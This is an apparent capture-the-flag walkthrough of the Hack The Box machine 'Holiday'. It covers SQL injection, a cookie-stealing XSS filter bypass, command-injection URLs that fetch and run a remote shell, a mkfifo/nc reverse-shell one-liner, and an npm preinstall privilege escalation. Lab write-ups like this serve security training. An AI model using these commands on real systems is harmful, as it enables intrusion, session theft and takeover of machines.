Holiday: hack the box

Introduction

Target: 10.10.10.25(Linux)

Kali: 10.10.16.65

Holiday is an insane box officially. It's really difficult to get the user permission. The most difficult part should be how to pass the XSS filter. It may need a lot of time. And the root privesc is based on the exploitation of npm install which is relatively fresh.

Information enumeration

As usual, use nmap to detect open ports and related services: nmap-A10.10.10.25 :

There are only two ports open. The port 8000 is an HTTP service which is hosted by Express. It should be our breakthrough.

Exploitation

Access to http://10.10.10.25:8000 , there is nothing except an image. Download the image, and try to see more information about the image with ExifTool. Nothing interesting found.

Then try to brute force the directory. Gobuster and dirbuster seem not to be very useful for this box. If you try dirb, you will soon find some important directories, including admin, login. Try to access http://10.10.10.25:8000/login . It is a login web page. Try to login with some default credentials. Not work. Then use burp to save the login request to a file.

Sqlmap

Try to use sqlmap to brute force the login request. Due to the awful network or something, sqlmap is slow for me to use for the boxed in hack the box. So try to prefer to get some important information instead of dump all information in sqlmap. For example, obtain tables firstly. Then dig into the interesting table.

By sqlmap, it seems that the database is SQLite and there are 5 tables. The users table is interesting. There may are some valid user and password.

A user is found. Hashkiller is a wonderful hash crack online tool. The hash can be cracked easily.

Log in with this user. It seems to be a booking website.

Click any booking and see the booking details. It consists of two tabs, including View and Notes. In Notes, one word is interesting: "All notes must be approved by an administrator - this process can take up to 1 minute." An administrator is always attractive to hackers. It seems that the note will be approved by the administrator. So it's possible to steal the session cookie of the administrator if there is an XSS vulnerability in the note edit form. I think it's the hardest part of this box. It's not easy to find the appropriate pass way. There is a way to utilize fromCharCode and other skills to pass the XSS filter. The following javascript code is utilized to generate the payload:

Set kali to listen to port 80: nc-lvnp80 . The code can be run in the chrome dev. Input the generated payload into the note, wait a minute the data will be sent to kali.

The cookie of the administrator is obtained which is HTML encoded. Decode it with a burp. And change the cookie in the storage of firefox. Refresh the web page. Now you can hijack the administrator session cookie. Access to http://10.10.10.25:8000/admin . There seems nothing special except two buttons, including Booking and Notes.

After some exploration, you will find that there is command injection in the two function url. You can try to access http://10.10.10.25:8000/admin/export?table=notes%26ls . You can find the directories in the exported file. One thing should be noticed, as & has been prohibited. So you can pass this by %26 . Hence, it seems that the table name exists RCE. But it's limited to characters, numbers and / . So you should try to RCE by these. It's not possible to use the command to obtain reverse shell by command. For example, rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|nc10.0.0.11234>/tmp/f . As many characters is not allowed.

Utilize msfvenom to generate the payload:

Then upload the shell to the victim and execute it. As you are not allowed to use . . So convert the IP address to decimal by this website. Access the following URLs to execute the corresponding commands:

• upload shell:  http://10.10.10.25:8000/admin/export?table=notes%26cd%20/tmp%20%26%26wget%20168431681/shell

• change permission:  http://10.10.10.25:8000/admin/export?table=notes%26chmod%20777%20/tmp/shell

• execute shell:  http://10.10.10.25:8000/admin/export?table=notes%26cd%20/tmp/shell

Before running the shell, you should set meterpreter in Kaili.

Then, we get the shell!

Privilege escalation

Check the sudo permissions firstly: sudo-l . You will find the user has the permission to execute sudo npm i . rimrafall this repository has described that npm install may be dangerous. It can be utilized to execute commands. You can upload the directory to the victim or create one by yourself.

Create the package.json and upload it to the target directory. preinstall can be utilized to execute the command. I have found that some command to obtain a reverse shell is not useful. As Perl is installed in the machine. And create a file called prel3 to obtain the reverse shell.

Set kali listen to port 3344: nc-lvnp3344 . In the victim, executed by: sudo npm i rimrafall . Now, we are root!

可以扫描二维码或者搜索 mad_coder 关注微信公众号，点击阅读原文可以获取链接版原文。